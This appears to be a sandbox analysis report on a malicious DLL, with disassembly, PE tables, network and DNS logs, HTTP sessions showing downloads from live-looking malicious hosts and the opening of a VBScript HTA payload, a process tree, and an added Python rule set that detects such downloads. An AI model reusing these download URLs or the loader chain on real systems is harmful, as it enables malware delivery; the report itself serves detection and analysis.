nop
nop
nop
nop
nop
nop
nop
nop
sub rsp, 38h
xor r9d, r9d
xor ecx, ecx
lea r8, qword ptr [rip+00002C50h]
lea rdx, qword ptr [rip+00002C81h]
mov qword ptr [rsp+20h], 00000000h
call 00007F65111F0070h
mov dword ptr [rsp+28h], 00000000h
xor ecx, ecx
lea r9, qword ptr [rip+00002CE6h]
mov qword ptr [rsp+20h], 00000000h
lea r8, qword ptr [rip+00002C1Ah]
lea rdx, qword ptr [rip+00002CDBh]
call qword ptr [rip+00007E11h]
xor eax, eax
add rsp, 38h
ret
nop
nop
nop
nop
nop
nop
jmp qword ptr [rip+00007E0Eh]
nop
nop
nop dword ptr [rax+rax+00000000h]
sub rsp, 28h
mov rax, qword ptr [rip+000000F5h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x8000 | 0x5a | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9000 | 0x414 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x5000 | 0x1c8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0x58 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x4120 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x9144 | 0xe0 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1328 | 0x1400 | 32ff09dc82dde9f98d726538c4dc19a9 | False | 0.580859375 | data | 5.916762377509803 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x40 | 0x200 | d8e9584bae269175cbc0023bf508acc9 | False | 0.05859375 | data | 0.322541603835012 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x4000 | 0x350 | 0x400 | 64cf4dd1b486dd6fa1c801aa0906d0dc | False | 0.3759765625 | data | 3.334673609437878 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata | 0x5000 | 0x1c8 | 0x200 | feb44b7e1d9d7a1f5c38c8e31cf91009 | False | 0.5390625 | data | 3.428853958367466 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata | 0x6000 | 0x130 | 0x200 | 5ffb25ed738474db92f0d755615a5bf1 | False | 0.322265625 | data | 2.629423229714015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0x7000 | 0xe0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x8000 | 0x5a | 0x200 | 6196243344bd26972d68bc5879134d71 | False | 0.166015625 | data | 0.9418501569517403 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata | 0x9000 | 0x414 | 0x600 | 676ff18ee333ec1f2c163635315b5480 | False | 0.283203125 | data | 2.7697675983474315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0xa000 | 0x58 | 0x200 | 6c31f3df6e0678b6eb3c26b1ca5e1e0d | False | 0.056640625 | data | 0.25323120180391656 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xb000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0xc000 | 0x58 | 0x200 | aaef006c86288ce5a1f076c63d4dc69f | False | 0.17578125 | data | 0.9130963814717786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
msvcrt.dll | __iob_func, _amsg_exit, _initterm, _lock, _unlock, abort, calloc, free, fwrite, realloc, strlen, strncmp, vfprintf
SHELL32.dll | ShellExecuteW
urlmon.dll | URLDownloadToFileW
Name | Ordinal | Address
hash | 1 | 0x2b1b83000
xlAutoOpen | 2 | 0x2b1b813a0
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 22, 2024 18:06:56.908706903 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:56.908740044 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:56.908843040 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:56.915554047 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:56.915565968 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:57.562136889 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:57.562261105 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:57.622812033 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:57.622840881 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:57.623128891 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:57.623178005 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:57.625715017 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:57.666544914 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:57.832674980 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:57.832701921 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:57.832750082 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:57.832926035 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:57.832926035 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:57.882435083 CEST | 49706 | 443 | 192.168.2.5 | 194.124.213.167
May 22, 2024 18:06:57.882458925 CEST | 443 | 49706 | 194.124.213.167 | 192.168.2.5
May 22, 2024 18:06:59.564702034 CEST | 49713 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:06:59.605520964 CEST | 80 | 49713 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:06:59.605608940 CEST | 49713 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:06:59.615890026 CEST | 49713 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:06:59.657457113 CEST | 80 | 49713 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:02.241275072 CEST | 49716 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:02.246532917 CEST | 80 | 49716 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:02.246607065 CEST | 49716 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:02.247396946 CEST | 49716 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:02.297301054 CEST | 80 | 49716 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:21.001909971 CEST | 80 | 49713 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:21.002120972 CEST | 49713 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:21.017606974 CEST | 49713 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:21.019998074 CEST | 49733 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:21.053293943 CEST | 80 | 49713 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:21.099318981 CEST | 80 | 49733 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:21.099404097 CEST | 49733 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:21.099709988 CEST | 49733 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:21.149245024 CEST | 80 | 49733 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:23.632251024 CEST | 80 | 49716 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:23.632770061 CEST | 49716 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:23.634923935 CEST | 49716 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:23.636194944 CEST | 49734 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:23.688515902 CEST | 80 | 49716 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:23.739648104 CEST | 80 | 49734 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:23.739834070 CEST | 49734 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:23.739954948 CEST | 49734 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:23.794073105 CEST | 80 | 49734 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:42.490109921 CEST | 80 | 49733 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:42.490180969 CEST | 49733 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:42.490452051 CEST | 49733 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:42.541254997 CEST | 80 | 49733 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:45.083749056 CEST | 80 | 49734 | 91.222.173.38 | 192.168.2.5
May 22, 2024 18:07:45.083826065 CEST | 49734 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:45.180996895 CEST | 49734 | 80 | 192.168.2.5 | 91.222.173.38
May 22, 2024 18:07:45.185904026 CEST | 80 | 49734 | 91.222.173.38 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 22, 2024 18:06:56.893462896 CEST | 56981 | 53 | 192.168.2.5 | 1.1.1.1
May 22, 2024 18:06:56.904855967 CEST | 53 | 56981 | 1.1.1.1 | 192.168.2.5
May 22, 2024 18:06:59.491966963 CEST | 57998 | 53 | 192.168.2.5 | 1.1.1.1
May 22, 2024 18:06:59.546125889 CEST | 53 | 57998 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 22, 2024 18:06:56.893462896 CEST | 192.168.2.5 | 1.1.1.1 | 0x4003 | Standard query (0) | www.siguefutbol.com | A (IP address) | IN (0x0001) | false
May 22, 2024 18:06:59.491966963 CEST | 192.168.2.5 | 1.1.1.1 | 0x7a60 | Standard query (0) | iapartmentlistings.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 22, 2024 18:06:56.904855967 CEST | 1.1.1.1 | 192.168.2.5 | 0x4003 | No error (0) | www.siguefutbol.com | siguefutbol.com | - | CNAME (Canonical name) | IN (0x0001) | false
May 22, 2024 18:06:56.904855967 CEST | 1.1.1.1 | 192.168.2.5 | 0x4003 | No error (0) | siguefutbol.com | - | 194.124.213.167 | A (IP address) | IN (0x0001) | false
May 22, 2024 18:06:59.546125889 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a60 | No error (0) | iapartmentlistings.com | - | 91.222.173.38 | A (IP address) | IN (0x0001) | false
        • www.siguefutbol.com
        • iapartmentlistings.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49713 | 91.222.173.38 | 80 | 7200 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 18:06:59.615890026 CEST | 175 | OUT | GET /tykhwuxk HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: iapartmentlistings.com
        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49716 | 91.222.173.38 | 80 | 7624 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 18:07:02.247396946 CEST | 175 | OUT | GET /tykhwuxk HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: iapartmentlistings.com
        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49733 | 91.222.173.38 | 80 | 7200 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 18:07:21.099709988 CEST | 175 | OUT | GET /tykhwuxk HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: iapartmentlistings.com
        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49734 | 91.222.173.38 | 80 | 7624 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 18:07:23.739954948 CEST | 175 | OUT | GET /tykhwuxk HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: iapartmentlistings.com
        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 194.124.213.167 | 443 | 4280 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-22 16:06:57 UTC | 336 | OUT | GET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: www.siguefutbol.com
        Connection: Keep-Alive
2024-05-22 16:06:57 UTC | 296 | IN | HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 22 May 2024 16:06:57 GMT
        Content-Type: text/plain
        Content-Length: 2331
        Last-Modified: Wed, 22 May 2024 12:55:26 GMT
        Connection: close
        Vary: Accept-Encoding
        ETag: "664deb3e-91b"
        Strict-Transport-Security: max-age=31536000
        Accept-Ranges: bytes
2024-05-22 16:06:57 UTC | 2331 | IN | Data Raw: 3c 68 65 61 64 3e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0d 0a 20 20 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 69 63 6f 6e 3d 22 23 22 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 20 53 59 53 4d 45 4e 55 3d 22 6e 6f 22 20 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 20 2f 3e 20 20 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 76 62 73 63 72 69 70 74 22 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
        Data Ascii: <head> <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> <script type="text/vbscript">
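The requests above carry two User-Agent strings worth keying on. The rundll32.exe request to www.siguefutbol.com uses the Mozilla/4.0 (compatible; MSIE 7.0; ...; Trident/7.0; ...) string that WinINet/urlmon sends on behalf of URLDownloadToFileW, which this sample imports; the powershell.exe requests carry the WindowsPowerShell/5.1.19041.1682 string that Invoke-WebRequest and Invoke-RestMethod send. Neither image is a browser, so the pairing of image name and User-Agent is a detection in itself. The following Python is an added example, not from the report or the sample: it parses the request heads as captured above (embedded as constructed input) and applies four rules: a non-browser image presenting the urlmon User-Agent, a PowerShell web request, a living-off-the-land binary originating HTTP at all, and cleartext port-80 traffic. It assumes the sensor attributes each socket to its owning image, as the sandbox does here; the BROWSERS and LOLBINS sets are the example's own and should be tuned to the environment.

```python
import re

# Constructed input, copied from the report's HTTP and HTTPS session tables:
# the PowerShell request to iapartmentlistings.com (the other three PowerShell
# sessions differ only in source port) and the rundll32.exe request that
# fetched the HTA from www.siguefutbol.com.
CAPTURED = [
    {
        "process": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "dst_ip": "91.222.173.38", "dst_port": 80,
        "raw": ("GET /tykhwuxk HTTP/1.1\r\n"
                "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) "
                "WindowsPowerShell/5.1.19041.1682\r\n"
                "Host: iapartmentlistings.com\r\n"
                "Connection: Keep-Alive\r\n\r\n"),
    },
    {
        "process": r"C:\Windows\System32\rundll32.exe",
        "dst_ip": "194.124.213.167", "dst_port": 443,
        "raw": ("GET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1\r\n"
                "Accept: */*\r\n"
                "UA-CPU: AMD64\r\n"
                "Accept-Encoding: gzip, deflate\r\n"
                "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; "
                "Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; "
                ".NET CLR 3.5.30729)\r\n"
                "Host: www.siguefutbol.com\r\n"
                "Connection: Keep-Alive\r\n\r\n"),
    },
]

# Images that legitimately present a browser User-Agent (assumption: extend to
# the browsers allowed in the environment).
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
# Living-off-the-land binaries that should rarely originate HTTP at all.
LOLBINS = {"rundll32.exe", "mshta.exe", "regsvr32.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}
# The legacy IE-compatible UA that WinINet/urlmon (URLDownloadToFileW) sends.
URLMON_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE \d+\.\d+;.*Trident/")


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.x request head into method, path, version and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def evaluate(process: str, dst_port: int, raw: str) -> list:
    """Return the names of the rules that fire for one request, in rule order."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    image = process.rsplit("\\", 1)[-1].lower()
    hits = []
    if image not in BROWSERS and URLMON_UA.match(ua):
        hits.append("urlmon_download_from_non_browser")
    # Windows PowerShell 5.1 sends "WindowsPowerShell/5.1.x", pwsh sends "PowerShell/7.x".
    if "PowerShell/" in ua:
        hits.append("powershell_web_request")
    if image in LOLBINS:
        hits.append("lolbin_outbound_http")
    if dst_port == 80:
        hits.append("cleartext_http")
    return hits


def triage(captured: list) -> dict:
    """Map 'image -> host:port' to the rules that fired, skipping clean requests."""
    result = {}
    for c in captured:
        host = parse_request(c["raw"])["headers"].get("host", c["dst_ip"])
        image = c["process"].rsplit("\\", 1)[-1].lower()
        hits = evaluate(c["process"], c["dst_port"], c["raw"])
        if hits:
            result[f"{image} -> {host}:{c['dst_port']}"] = hits
    return result


if __name__ == "__main__":
    for key, hits in triage(CAPTURED).items():
        print(key, ", ".join(hits))
```

On the captured input the rundll32.exe request fires urlmon_download_from_non_browser and lolbin_outbound_http, and the powershell.exe request fires powershell_web_request, lolbin_outbound_http and cleartext_http. The same rules applied to the sandbox's own process list would also flag the mshta.exe child that ran the HTA, since mshta.exe is in LOLBINS and the HTA hands the download to PowerShell.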



        Target ID:0
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\loaddll64.exe
        Wow64 process (32bit):false
        Commandline:loaddll64.exe "C:\Users\user\Desktop\UPazTgVGA7.dll"
        Imagebase:0x7ff658d80000
        File size:165'888 bytes
        MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:1
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
        Imagebase:0x7ff7d30b0000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:3
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hash
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\rundll32.exe
        Wow64 process (32bit):false
        Commandline:rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
        Imagebase:0x7ff7b7400000
        File size:71'680 bytes
        MD5 hash:EF3179D498793BF4234F708D3BE28633
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:8
        Start time:12:06:52
        Start date:22/05/2024
        Path:C:\Windows\System32\WerFault.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\WerFault.exe -u -p 2668 -s 424
        Imagebase:0x7ff611130000
        File size:570'736 bytes
        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
